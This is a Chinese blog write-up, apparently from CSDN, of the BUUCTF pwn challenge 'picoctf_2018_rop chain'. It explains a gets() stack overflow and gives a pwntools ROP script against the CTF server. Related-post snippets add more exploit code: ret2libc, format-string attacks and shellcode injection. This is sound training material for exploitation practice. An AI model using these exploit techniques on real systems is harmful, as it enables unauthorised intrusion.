[BUUCTF]PWN——picoctf_2018_rop chain

最新推荐文章于 2022-08-13 22:59:45 发布
最新推荐文章于 2022-08-13 22:59:45 发布
阅读量216 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BangSen1/article/details/115557479
版权

picoctf_2018_rop chain

例行检查 ,32位,开启NX保护。
在这里插入图片描述
运行一下。
在这里插入图片描述
用IDA打开。看到了flag.txt,
跟进查看在这里插入图片描述
当win1&&win2 &&a1==-59039827时,得到flag。
在这里插入图片描述
查看main函数。

在这里插入图片描述
vuln中的gets函数存在溢出漏洞,覆盖ret为flag函数地址,之后想办法去满足那个if判断即可获得flag
在这里插入图片描述
function1函数 win1被 赋值为1
在这里插入图片描述
function2 当a1 == -1163220307时, win2也被赋值为1

在这里插入图片描述
首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win的值为1,之后去执行flag函数,if要满足的条件之前都设置好了,可以直接读出flag

from pwn import *

r = remote("node3.buuoj.cn", 26990)

win_function1 = 0x080485CB
win_function2 = 0x080485D8
flag = 0x0804862B

payload = "a" * 0x1c
payload += p32(win_function1)
payload += p32(win_function2) + p32(flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD)


r.sendlineafter("input> ", payload)

r.interactive()

![在这里插入图片描述](https://img-blog.csdnimg.cn/20210409193720525.png)
HAIANAWEI
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1293
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
BUUCTF pwn——picoctf_2018_rop chain
最新发布
CNS-Enterprise BCC-1701-J
04-26 554
BUUCTF 做题练习
[BUUCTF]PWN——picoctf_2018_got_shell
mcmuyanga的博客
01-22 356
picoctf_2018_got_shell 附件 步骤: 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,提示了两个地址 32位ida载入,检索字符串发现了后门,shell_addr=0x804854B main() 让我们将内容写入到我们选择的地址上。一开始想尝试溢出后来发现没有溢出漏洞 那么就根据程序的功能,将后门写入到puts@got上,这样在执行第16行的puts的时候我们就能获取shell了 完整exp from pwn import * r=remote('no
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me
Y_peak的博客
02-24 386
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me 题目地址:https://buuoj.cn/challenges#picoctf_2018_can_you_gets_me 通过这道题又学到了一个知识点。ROPgadget构造rop链 还是先checksec一下 在IDA中,查看一下。有gets栈溢出,又有puts函数。想当然的我们想到,通过puts函数,leek出一个got表地址,找到libc的栈基址,进而找到system函数和’/bin/sh’ 尝试过后你会
[BUUCTF]PWN——picoctf_2018_can_you_gets_me
mcmuyanga的博客
01-21 712
picoctf_2018_can_you_gets_me 附件 步骤: 例行检查,32位,开启了nx 本地试运行一下,看看大概的情况 32位ida载入 一开始一看发现是简单的栈溢出,直接就准备用ret2libc的方法了,但是在我找plt表找put@plt的时候我傻了,没有,双击一下puts,发现找个puts是出题人自己写的函数 想起来了之前做到的一道题目inndy_rop,那题也是没法利用got表,所以利用了工具ROPgadget,它有一个功能,可以直接利用程序中的片段拼凑rop链,这边也尝试一下
[BUUCTF-pwn]——picoctf_2018_rop chain
Y_peak的博客
02-23 189
[BUUCTF-pwn]——picoctf_2018_rop chain 题目地址: https://buuoj.cn/challenges#picoctf_2018_rop%20chain checksec看看,开启了NX,但是没有canary IDA中查看一下 发现gets函数,可以栈溢出 发现flag,不过需要满足条件,才可以获得 接着找可能用到的函数 接着找到对应函数的地址 思路 利用栈溢出,构造rop链,首先将win1 = 1, 然后 win2 = 1,最后获得flag explo
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1051
buuctf pwn
BUUCTF刷题5
m0_51251108的博客
10-30 555
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4425
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
[BUUCTF]PWN——jarvisoj_level2_x64
BangSen1的博客
03-30 1309
jarvisoj_level2_x64 例行检查 ,64位,开启NX保护, 运行一下 用IDA打开。 systemaddr=0x40063e shalladdr=0x400A90 查看主函数,buf的长度为0x80,读取的长度为0x200,可以造成溢出漏洞。 rdiaddr= 0x4006b3 from pwn import * context(log_level = 'debug') elf = ELF('./level2_x64') p = remote('node3.buuoj.cn',
[BUUCTF]PWN——jarvisoj_level3
BangSen1的博客
03-16 1243
jarvisoj_level3 32位,NX保护。 运行程序。 用IDA打开,shift+f12检索 ,找到关键函数。 参数buf溢出漏洞,利用ret2libc获取shell。 1,利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('
[BUUCTF]PWN——bjdctf_2020_babystack2
BangSen1的博客
04-06 903
bjdctf_2020_babystack2 64位,开启NX保护。 运行一下。 用IDA打开。找到了后门函数。backdoor=0x400726 查看main函数 读入数据的大小由我们输入的参数nbytes控制 nbytes参数的类型 是 size_t,它是一个无符号整型。 但是第7行又将它转换成了有符号的整型,存在整数溢出漏洞(即无符号的数转换成有符号的整型后超过了有符号的整型能表示的范围,从而造成溢出,常用-1来造成溢出) from pwn import * r=remote('nod
[BUUCTF]PWN——jarvisoj_tell_me_something
BangSen1的博客
03-18 736
jarvisoj_tell_me_something 例行检查,开启NX保护,64bit 运行一下 用IDA打开,看到了关键函数 flag.txt.跟进一下。 flag_addr=0x400620 看一下主函数。 输入点的v4溢出漏洞,利用它覆盖返回地址为flag_addr的地址读出flag。 汇编结尾没有leave 起步刚开始就直接是rsp减去0x88,这里是没有把rbp压入栈,所以只需要0x88的数据大小,就可以覆盖返回地址了 from pwn import * r=remote('nod
[BUUCTF]PWN------warmup_csaw_2016
BangSen1的博客
01-14 538
warmup_csaw_2016 例行检查 ,64位,无保护 运行一下,没什么信息。 用64位IDA打开,查看字符串,看到了cat flag,进去瞧瞧 可以看到这个函数的功能就是输出flag,记录下他的地址 flag_addr=0x40060D 再回到主函数瞧瞧,可以看到最后是输出了v5,gets函数并没有限制长度,因此存在溢出漏洞。v5的大小是0x40,因此只要我们输入的字符串长度=0x40+8(64位ebp的长度)即可溢出到返回地址,再将返回地址覆盖输出flag的那个函数地址即可 得到fla
[BUUCTF]PWN——ciscn_2019_s_9
BangSen1的博客
04-26 526
ciscn_2019_s_9 参考 例行检查 ,32位,未开启任何保护 运行一下。 32位ida载入,,第10行的fgets,能够溢出0x32-0x20-0x4个字节 没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode 生成的shellcode的长度过长,参数 s0x20(32) 写不下。 shellcode =''' xor eax,eax #eax置0 xor edx,edx #edx置0 push edx #将0入栈,标
[BUUCTF]PWN——picoctf_2018_buffer overflow 2
BangSen1的博客
03-31 520
picoctf_2018_buffer overflow 2 例行检查,32位,开启NX保护 运行一下, 用IDA打开。看到了flag.txt,跟进一下。 win函数地址为0x80485cb a1 == 0xDEADBEEF && a2 == 0xDEADC0DE 时,输出flag. from pwn import* r=remote('node3.buuoj.cn',26224) payload='a'*(0x6c+4)+p32(0x80485cb)+p32(0)+p32(0x
[BUUCFT]PWN——pwn2_sctf_2016
BangSen1的博客
04-03 449
pwn2_sctf_2016 例行检查,32位,开启了NX保护。 运行一下 用IDA打开。main函数调用了vuln函数 接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,这边可以输入负数来达到溢出的效果(整数溢出) 我们可以通过,输入负数,绕过长度限制,造成溢出,再利用printf函数泄露程序的libc版本,去算出system和‘/bin/sh‘的地址,最后溢出覆盖返回地址去执行system(‘/bin/sh’) f
[BUUCTF]PWN——[BSidesCF 2019]Runit
BangSen1的博客
04-26 423
[BSidesCF 2019]Runit 例行检查 ,32位,开启NX保护 运行一下。 IDA打开,查看主函数。 buf用mmap映射了地址,可读可写可执行,直接传入shellcode,15行调用了buf,运行shellcode获取shell。 from pwn import * p=remote("node3.buuoj.cn",26059) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.
[BUUCTF]PWN——jarvisoj_test_your_memory
BangSen1的博客
04-09 372
jarvisoj_test_your_memory 例行检查 ,32位,开启了NX保护 运行一下,跳出了一个地址0x80487e0 用IDA打开。看到了cat flag.还有system 找到了他们的地址 查看main函数 mem_test函数 存在溢出漏洞,由于之前检索字符串的时候发现程序里调用了system函数,可以覆盖ret为system函数,去执行system。 from pwn import * r =remote('node3.buuoj.cn',27075) syst
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值